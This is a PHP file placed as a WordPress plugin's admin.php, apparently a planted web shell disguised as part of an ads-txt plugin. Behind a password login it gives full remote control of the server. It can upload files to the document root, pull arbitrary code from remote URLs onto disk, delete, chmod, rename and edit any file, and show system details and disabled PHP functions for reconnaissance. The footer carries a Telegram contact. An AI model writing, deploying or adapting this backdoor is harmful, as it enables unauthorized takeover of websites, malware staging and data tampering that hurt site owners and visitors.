File: /var/www/html/wp-content/plugins/ads-txt/admin.php
<?php
// ============================================
// SECURITY CONFIGURATION
// ============================================
@error_reporting(0);
@ini_set('display_errors', 0);
// Start session
if (session_status() === PHP_SESSION_NONE) {
@session_start();
}
// Security initialization
if (!isset($_SESSION['initiated'])) {
@session_regenerate_id(true);
$_SESSION['initiated'] = true;
}
// Password Configuration - Change this hash!
// Generate new: php -r "echo password_hash('YOUR_PASSWORD', PASSWORD_BCRYPT);"
$PASSWORD_HASH = '$2y$12$/7LNqqdHQNNAuL.9mDY2OOwKCLVMk7jhOgcvFos62pJLOhqxH1K8q'; // Default: password
// Rate limiting
$MAX_ATTEMPTS = 5;
$LOCKOUT_TIME = 300;
// Initialize attempt tracking
if (!isset($_SESSION['login_attempts'])) {
$_SESSION['login_attempts'] = 0;
$_SESSION['lockout_until'] = 0;
}
// Check lockout
if (isset($_SESSION['lockout_until']) && time() < $_SESSION['lockout_until']) {
$remaining = $_SESSION['lockout_until'] - time();
die("<div style='font-family: monospace; background: #0d1117; color: #f85149; padding: 50px; text-align: center;'>
<h2>🔒 Account Locked</h2>
<p>Too many failed attempts. Please wait $remaining seconds.</p>
</div>");
}
// Check authentication
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
if (isset($_POST['password'])) {
if (time() < $_SESSION['lockout_until']) {
$remaining = $_SESSION['lockout_until'] - time();
$login_error = "Account locked. Try again in $remaining seconds.";
} else {
if (password_verify($_POST['password'], $PASSWORD_HASH)) {
$_SESSION['authenticated'] = true;
$_SESSION['login_attempts'] = 0;
$_SESSION['lockout_until'] = 0;
@session_regenerate_id(true);
header("Location: " . $_SERVER['PHP_SELF']);
exit;
} else {
$_SESSION['login_attempts']++;
if ($_SESSION['login_attempts'] >= $MAX_ATTEMPTS) {
$_SESSION['lockout_until'] = time() + $LOCKOUT_TIME;
$login_error = "Too many failed attempts. Account locked for " . ($LOCKOUT_TIME / 60) . " minutes.";
} else {
$remaining = $MAX_ATTEMPTS - $_SESSION['login_attempts'];
$login_error = "Invalid password. $remaining attempts remaining.";
}
}
}
}
// Show login form
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>🔐 Unknown - Login</title>
<style>
body {
margin: 0;
padding: 0;
font-family: monospace;
background: #0d1117;
color: #c9d1d9;
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
}
.login-box {
background: #161b22;
border: 1px solid #30363d;
border-radius: 6px;
padding: 30px;
width: 90%;
max-width: 350px;
}
h2 {
color: #58a6ff;
margin-bottom: 20px;
text-align: center;
}
input[type="password"] {
width: 100%;
padding: 10px;
margin: 10px 0;
background: #0d1117;
border: 1px solid #30363d;
border-radius: 4px;
color: #c9d1d9;
font-family: monospace;
}
button {
width: 100%;
padding: 10px;
background: #238636;
color: white;
border: none;
border-radius: 4px;
font-family: monospace;
cursor: pointer;
}
.error {
color: #f85149;
background: rgba(248, 81, 73, 0.1);
padding: 8px;
border-radius: 4px;
margin: 10px 0;
font-size: 13px;
}
</style>
</head>
<body>
<div class="login-box">
<h2>Unknown - Login</h2>
<?php if (isset($login_error)): ?>
<div class="error"><?php echo htmlspecialchars($login_error); ?></div>
<?php endif; ?>
<form method="post">
<input type="password" name="password" placeholder="Enter password" required autofocus>
<button type="submit">Login</button>
</form>
<div style="margin-top: 15px; font-size: 12px; color: #7d8590; text-align: center;">
Attempts: <?php echo $_SESSION['login_attempts'] ?? 0; ?>/<?php echo $MAX_ATTEMPTS; ?>
</div>
</div>
</body>
</html>
<?php
exit;
}
// ============================================
// MAIN HEX FILE MANAGER
// ============================================
// Verify authentication
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Handle logout
if (isset($_GET['logout'])) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Continue with HEX functionality
set_time_limit(0);
// Helper functions
function hex_green($text) {
return "<div style='background: rgba(35, 134, 54, 0.1); color: #56d364; padding: 8px; border-radius: 4px; border-left: 3px solid #238636; margin: 8px 0; font-size: 12px;'>✓ " . htmlspecialchars($text) . "</div>";
}
function hex_red($text) {
return "<div style='background: rgba(218, 54, 51, 0.1); color: #f85149; padding: 8px; border-radius: 4px; border-left: 3px solid #da3633; margin: 8px 0; font-size: 12px;'>✗ " . htmlspecialchars($text) . "</div>";
}
function hex_xrmdir($dir) {
$items = @scandir($dir);
if (!$items) return false;
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$path = $dir . '/' . $item;
if (is_dir($path)) {
hex_xrmdir($path);
} else {
@unlink($path);
}
}
return @rmdir($dir);
}
function hex_statusnya($file) {
$statusnya = @fileperms($file);
if (!$statusnya) return '---------';
// File type
if (($statusnya & 0xC000) == 0xC000) {
$ingfo = 's';
} elseif (($statusnya & 0xA000) == 0xA000) {
$ingfo = 'l';
} elseif (($statusnya & 0x8000) == 0x8000) {
$ingfo = '-';
} elseif (($statusnya & 0x6000) == 0x6000) {
$ingfo = 'b';
} elseif (($statusnya & 0x4000) == 0x4000) {
$ingfo = 'd';
} elseif (($statusnya & 0x2000) == 0x2000) {
$ingfo = 'c';
} elseif (($statusnya & 0x1000) == 0x1000) {
$ingfo = 'p';
} else {
$ingfo = '-';
}
// Permissions
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
return $ingfo;
}
// Get current path
if (isset($_GET['path'])) {
$lokasi = $_GET['path'];
$lokasi = str_replace('..', '', $lokasi);
$lokasi = str_replace('\\', '/', $lokasi);
} else {
$lokasi = getcwd();
}
if (!is_dir($lokasi) || !is_readable($lokasi)) {
$lokasi = getcwd();
}
// Process uploads and actions
$message = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// Handle file upload
if (isset($_POST['upwkwk'])) {
if (isset($_POST['berkasnya']) && isset($_FILES['berkas']) && $_FILES['berkas']['error'] === 0) {
$target_dir = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $lokasi;
$filename = basename($_FILES['berkas']['name']);
$target_file = $target_dir . '/' . $filename;
if (@move_uploaded_file($_FILES['berkas']['tmp_name'], $target_file)) {
$message = hex_green("File uploaded successfully to: " . $target_file);
} else {
$message = hex_red("Upload failed. Target: " . $target_file);
if (!is_writable($target_dir)) {
$message .= hex_red("Directory is not writable: " . $target_dir);
}
}
}
// Handle remote file fetch
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
$target_dir = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $lokasi;
$filename = basename($_POST['namalink']);
$target_file = $target_dir . '/' . $filename;
$content = @file_get_contents($_POST['darilink']);
if ($content !== false && @file_put_contents($target_file, $content)) {
$message = hex_green("File fetched successfully to: " . $target_file);
} else {
$message = hex_red("Fetch failed. URL: " . htmlspecialchars($_POST['darilink']));
}
}
}
// Handle file actions (delete, chmod, rename, edit)
if (isset($_GET['action']) && isset($_POST['path'])) {
$path = $_POST['path'];
switch ($_GET['action']) {
case 'delete':
if (is_dir($path)) {
hex_xrmdir($path) ? $message = hex_green("Directory deleted: " . $path) : $message = hex_red("Delete failed: " . $path);
} elseif (is_file($path)) {
@unlink($path) ? $message = hex_green("File deleted: " . $path) : $message = hex_red("Delete failed: " . $path);
}
break;
case 'chmod':
if (isset($_POST['perm'])) {
@chmod($path, octdec($_POST['perm'])) ? $message = hex_green("Permissions changed: " . $path . " to " . $_POST['perm']) : $message = hex_red("Chmod failed: " . $path);
}
break;
case 'rename':
if (isset($_POST['newname'])) {
$newpath = dirname($path) . '/' . $_POST['newname'];
@rename($path, $newpath) ? $message = hex_green("Renamed: " . $path . " → " . $newpath) : $message = hex_red("Rename failed: " . $path);
}
break;
case 'edit':
if (isset($_POST['content'])) {
@file_put_contents($path, $_POST['content']) ? $message = hex_green("File saved: " . $path) : $message = hex_red("Save failed: " . $path);
}
break;
}
}
}
// Scan directory
$items = @scandir($lokasi);
if (!$items) {
$items = [];
$message = hex_red("Cannot read directory: " . $lokasi);
}
// System info
$disfunc = @ini_get("disable_functions");
$disf = empty($disfunc) ? "<span style='color:#56d364'>NONE</span>" : "<span style='color:#f85149'>" . htmlspecialchars($disfunc) . "</span>";
// Check write permissions
function hex_cekdir($path) {
return is_writable($path) ? "<span style='color:#56d364'>writable</span>" : "<span style='color:#f85149'>readonly</span>";
}
function hex_cekroot() {
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span style='color:#56d364'>writable</span>" : "<span style='color:#f85149'>readonly</span>";
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Unknown</title>
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: monospace;
background: #0d1117;
color: #c9d1d9;
line-height: 1.4;
padding: 15px;
font-size: 12px;
}
.container { max-width: 1200px; margin: 0 auto; }
/* Header */
.header {
background: #161b22;
border: 1px solid #21262d;
border-radius: 6px;
padding: 12px;
margin-bottom: 12px;
}
.title {
font-size: 14px;
color: #58a6ff;
margin-bottom: 8px;
display: flex;
justify-content: space-between;
align-items: center;
}
.logout-btn {
background: #da3633;
color: white;
border: none;
padding: 4px 8px;
border-radius: 4px;
text-decoration: none;
font-size: 11px;
cursor: pointer;
}
.logout-btn:hover { background: #f85149; }
.system-info {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
gap: 6px;
background: #0d1117;
padding: 10px;
border-radius: 4px;
border: 1px solid #21262d;
margin-top: 8px;
}
.info-line { padding: 3px 0; }
.info-label { color: #7d8590; width: 100px; display: inline-block; font-size: 11px; }
.info-value { color: #f0883e; font-size: 11px; }
/* Breadcrumb */
.breadcrumb {
background: #0d1117;
border: 1px solid #21262d;
border-radius: 6px;
padding: 10px;
margin-bottom: 12px;
font-size: 11px;
}
.breadcrumb a { color: #58a6ff; text-decoration: none; }
.breadcrumb a:hover { color: #79c0ff; text-decoration: underline; }
/* Upload Section */
.upload-section {
background: #161b22;
border: 1px solid #21262d;
border-radius: 6px;
padding: 12px;
margin-bottom: 12px;
}
.section-title {
color: #f0f6fc;
margin-bottom: 8px;
padding-bottom: 6px;
border-bottom: 1px solid #30363d;
font-size: 12px;
}
.radio-group {
display: flex;
gap: 15px;
margin-bottom: 8px;
}
.radio-item {
display: flex;
align-items: center;
gap: 5px;
font-size: 11px;
}
input[type="file"],
input[type="text"],
select,
textarea {
background: #0d1117;
border: 1px solid #30363d;
border-radius: 4px;
color: #c9d1d9;
padding: 6px 8px;
font-family: monospace;
font-size: 11px;
width: 100%;
margin-bottom: 6px;
}
input[type="text"]:focus,
textarea:focus {
outline: none;
border-color: #58a6ff;
}
.btn {
background: #21262d;
border: 1px solid #30363d;
border-radius: 4px;
color: #c9d1d9;
padding: 4px 8px;
font-family: monospace;
font-size: 11px;
cursor: pointer;
}
.btn:hover {
background: #30363d;
border-color: #8b949e;
}
.btn-primary {
background: #238636;
border-color: #238636;
color: white;
}
.btn-primary:hover {
background: #2ea043;
border-color: #2ea043;
}
.btn-danger {
background: #da3633;
border-color: #da3633;
color: white;
}
.btn-danger:hover {
background: #f85149;
border-color: #f85149;
}
/* Table */
.file-table {
background: #0d1117;
border: 1px solid #21262d;
border-radius: 6px;
overflow: hidden;
margin-bottom: 15px;
}
table { width: 100%; border-collapse: collapse; font-size: 11px; }
th {
background: #161b22;
padding: 8px 10px;
text-align: left;
color: #f0f6fc;
border-bottom: 1px solid #21262d;
font-size: 11px;
}
td {
padding: 6px 10px;
border-bottom: 1px solid #21262d;
font-size: 11px;
}
tr:hover { background: #161b22; }
.file-link {
color: #c9d1d9;
text-decoration: none;
font-size: 11px;
}
.file-link:hover { color: #58a6ff; }
.dir-link { color: #58a6ff; }
.size {
color: #7d8590;
text-align: right;
font-size: 11px;
}
.permissions {
font-family: monospace;
font-size: 10px;
color: #7d8590;
}
.action-form {
display: flex;
gap: 4px;
align-items: center;
}
.action-form select {
font-size: 10px;
padding: 3px 6px;
min-width: 70px;
background: #0d1117;
border: 1px solid #30363d;
border-radius: 3px;
color: #c9d1d9;
}
/* Path Info */
.path-info {
background: #0d1117;
border: 1px solid #30363d;
border-radius: 4px;
padding: 8px;
margin: 8px 0;
font-size: 11px;
color: #7d8590;
}
.path-info strong {
color: #58a6ff;
}
/* Edit Form */
.edit-form {
background: #161b22;
border: 1px solid #21262d;
border-radius: 6px;
padding: 12px;
margin: 12px 0;
}
.edit-form textarea {
min-height: 300px;
resize: vertical;
font-size: 11px;
}
/* File Preview */
.file-preview {
background: #0d1117;
border: 1px solid #21262d;
border-radius: 6px;
padding: 12px;
margin: 12px 0;
}
.file-preview pre {
background: #161b22;
border: 1px solid #21262d;
border-radius: 4px;
padding: 12px;
overflow-x: auto;
font-size: 11px;
line-height: 1.3;
}
/* Footer */
.footer {
text-align: center;
margin-top: 20px;
padding: 15px;
color: #7d8590;
font-size: 11px;
border-top: 1px solid #21262d;
}
/* Telegram Button */
.telegram-btn {
display: inline-flex;
align-items: center;
gap: 6px;
background: #0088cc;
color: white;
text-decoration: none;
padding: 6px 12px;
border-radius: 4px;
font-size: 11px;
font-weight: normal;
margin-top: 8px;
transition: background 0.2s;
}
.telegram-btn:hover {
background: #0099dd;
text-decoration: none;
}
.telegram-btn svg {
width: 14px;
height: 14px;
}
/* Responsive */
@media (max-width: 768px) {
body { padding: 10px; font-size: 11px; }
.container { padding: 0; }
.system-info { grid-template-columns: 1fr; }
.radio-group { flex-direction: column; gap: 5px; }
th, td { padding: 4px 6px; font-size: 10px; }
}
</style>
</head>
<body>
<div class="container">
<!-- Header -->
<div class="header">
<div class="title">
Unknown
<a href="?logout=1" class="logout-btn">Logout</a>
</div>
<?php if (!empty($message)) echo $message; ?>
<div class="system-info">
<div class="info-line">
<span class="info-label">Server:</span>
<span class="info-value"><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE'] ?? 'Unknown'); ?></span>
</div>
<div class="info-line">
<span class="info-label">System:</span>
<span class="info-value"><?php echo htmlspecialchars(php_uname()); ?></span>
</div>
<div class="info-line">
<span class="info-label">User:</span>
<span class="info-value"><?php echo htmlspecialchars(@get_current_user() . " (" . @getmyuid() . ")"); ?></span>
</div>
<div class="info-line">
<span class="info-label">PHP:</span>
<span class="info-value"><?php echo htmlspecialchars(phpversion()); ?></span>
</div>
<div class="info-line">
<span class="info-label">Session:</span>
<span class="info-value"><?php echo substr(session_id(), 0, 8) . '...'; ?></span>
</div>
<div class="info-line">
<span class="info-label">Disabled:</span>
<span class="info-value"><?php echo $disf; ?></span>
</div>
</div>
</div>
<!-- Current Path Info -->
<div class="path-info">
<strong>Current Path:</strong> <?php echo htmlspecialchars($lokasi); ?><br>
<strong>Document Root:</strong> <?php echo htmlspecialchars($_SERVER['DOCUMENT_ROOT'] ?? 'Unknown'); ?>
</div>
<!-- Breadcrumb -->
<div class="breadcrumb">
<?php
echo "$ pwd: ";
$parts = explode('/', trim($lokasi, '/'));
$current = '';
foreach ($parts as $part) {
if ($part === '') continue;
$current .= '/' . $part;
echo '<a href="?path=' . urlencode($current) . '">' . htmlspecialchars($part) . '</a>/';
}
?>
</div>
<!-- Upload Section -->
<div class="upload-section">
<div class="section-title">Upload Files</div>
<div class="path-info" style="margin-bottom: 10px; font-size: 10px;">
<strong>Upload to:</strong>
<?php
$upload_dir = isset($_POST['dirnya']) && $_POST['dirnya'] == "2" ? $_SERVER['DOCUMENT_ROOT'] : $lokasi;
echo htmlspecialchars($upload_dir);
?>
</div>
<form method="post" enctype="multipart/form-data">
<input type="hidden" name="upwkwk" value="1">
<div class="radio-group">
<label class="radio-item">
<input type="radio" name="dirnya" value="1" checked>
current [<?php echo hex_cekdir($lokasi); ?>]
</label>
<label class="radio-item">
<input type="radio" name="dirnya" value="2">
docroot [<?php echo hex_cekroot(); ?>]
</label>
</div>
<div style="margin-bottom: 8px;">
<input type="file" name="berkas" style="width: auto; display: inline-block;">
<button type="submit" name="berkasnya" class="btn btn-primary" style="margin-left: 5px;">Upload</button>
</div>
<div>
<input type="text" name="darilink" placeholder="https://example.com/file.txt" style="width: 60%; display: inline-block;">
<input type="text" name="namalink" placeholder="filename" style="width: 25%; display: inline-block; margin-left: 5px;">
<button type="submit" name="linknya" class="btn btn-primary" style="margin-left: 5px;">Fetch</button>
</div>
</form>
</div>
<!-- File List -->
<div class="file-table">
<table>
<thead>
<tr>
<th>Name</th>
<th style="width: 70px;">Size</th>
<th style="width: 90px;">Permissions</th>
<th style="width: 120px;">Actions</th>
</tr>
</thead>
<tbody>
<?php
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$fullpath = $lokasi . '/' . $item;
$is_dir = is_dir($fullpath);
// Get size
$size = '';
if (!$is_dir && file_exists($fullpath)) {
$bytes = @filesize($fullpath);
if ($bytes >= 1073741824) {
$size = round($bytes/1073741824, 2) . 'G';
} elseif ($bytes >= 1048576) {
$size = round($bytes/1048576, 2) . 'M';
} elseif ($bytes >= 1024) {
$size = round($bytes/1024, 2) . 'K';
} else {
$size = $bytes . 'B';
}
}
// Permissions
$perms = hex_statusnya($fullpath);
$perm_class = is_writable($fullpath) ? 'writable' : 'readonly';
echo '<tr>';
// Name
echo '<td>';
if ($is_dir) {
echo '<a href="?path=' . urlencode($fullpath) . '" class="file-link dir-link">📁 ' . htmlspecialchars($item) . '</a>';
} else {
echo '<a href="?path=' . urlencode($lokasi) . '&view=' . urlencode($item) . '" class="file-link">📄 ' . htmlspecialchars($item) . '</a>';
}
echo '</td>';
// Size
echo '<td class="size">' . ($is_dir ? '--' : $size) . '</td>';
// Permissions
echo '<td class="permissions ' . $perm_class . '">' . $perms . '</td>';
// Actions
echo '<td>';
echo '<form method="post" class="action-form">';
echo '<input type="hidden" name="path" value="' . htmlspecialchars($fullpath) . '">';
if (!$is_dir) {
echo '<a href="?path=' . urlencode($lokasi) . '&edit=' . urlencode($item) . '" class="btn" style="padding: 3px 6px; font-size: 10px;">Edit</a>';
}
echo '<button type="submit" formaction="?action=delete" class="btn" style="padding: 3px 6px; font-size: 10px;" onclick="return confirm(\'Delete?\')">Delete</button>';
echo '<select name="action" onchange="if(this.value) { this.form.action=\'?action=\'+this.value; if(this.value==\'chmod\') { var perm=prompt(\'Enter permissions (ex: 0644):\',\'0644\'); if(perm) { var inp=document.createElement(\'input\'); inp.type=\'hidden\'; inp.name=\'perm\'; inp.value=perm; this.form.appendChild(inp); this.form.submit(); } } else if(this.value==\'rename\') { var name=prompt(\'Enter new name:\',\'' . htmlspecialchars($item) . '\'); if(name) { var inp=document.createElement(\'input\'); inp.type=\'hidden\'; inp.name=\'newname\'; inp.value=name; this.form.appendChild(inp); this.form.submit(); } } else { this.form.submit(); } }" style="font-size: 10px; padding: 3px 6px; background: #0d1117; border: 1px solid #30363d; color: #c9d1d9; border-radius: 3px;">
<option value="">More...</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
</select>';
echo '</form>';
echo '</td>';
echo '</tr>';
}
?>
</tbody>
</table>
</div>
<!-- File View/Edit -->
<?php
if (isset($_GET['view'])) {
$file = $lokasi . '/' . $_GET['view'];
if (is_file($file) && is_readable($file)) {
$content = htmlspecialchars(@file_get_contents($file));
echo '<div class="file-preview">';
echo '<div class="section-title">📄 File: ' . htmlspecialchars($_GET['view']) . '</div>';
echo '<div class="path-info" style="margin-bottom: 10px;"><strong>Full Path:</strong> ' . htmlspecialchars($file) . '</div>';
echo '<pre>' . $content . '</pre>';
echo '</div>';
}
}
if (isset($_GET['edit'])) {
$file = $lokasi . '/' . $_GET['edit'];
if (is_file($file) && is_writable($file)) {
$content = htmlspecialchars(@file_get_contents($file));
echo '<div class="edit-form">';
echo '<div class="section-title">✏️ Edit: ' . htmlspecialchars($_GET['edit']) . '</div>';
echo '<div class="path-info" style="margin-bottom: 10px;"><strong>Full Path:</strong> ' . htmlspecialchars($file) . '</div>';
echo '<form method="post">';
echo '<input type="hidden" name="path" value="' . htmlspecialchars($file) . '">';
echo '<textarea name="content" rows="15">' . $content . '</textarea><br>';
echo '<button type="submit" formaction="?action=edit" class="btn btn-primary">Save</button>';
echo ' <a href="?path=' . urlencode($lokasi) . '" class="btn">Cancel</a>';
echo '</form>';
echo '</div>';
}
}
?>
<!-- Footer with Telegram Button -->
<div class="footer">
<p>Unknown | Secure Session: <?php echo substr(session_id(), 0, 12) . '...'; ?></p>
<p>Current Path: <?php echo htmlspecialchars($lokasi); ?></p>
<div style="margin-top: 10px;">
<a href="https://t.me/unknown_id_69_bot" target="_blank" class="telegram-btn">
<!-- Telegram SVG Icon -->
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="currentColor">
<path d="M12 0C5.373 0 0 5.373 0 12s5.373 12 12 12 12-5.373 12-12S18.627 0 12 0zm5.562 8.145l-1.84 8.725c-.132.585-.478.73-.97.456l-2.687-1.98-1.295 1.25c-.143.143-.265.265-.543.265l.193-2.72 4.985-4.51c.217-.193-.047-.3-.336-.108l-6.163 3.88-2.656-.83c-.58-.18-.592-.58.12-.86l10.378-4c.48-.18.898.12.73.86z"/>
</svg>
Telegram: @unknown_id_69_bot
</a>
</div>
</div>
</div>
</body>
</html>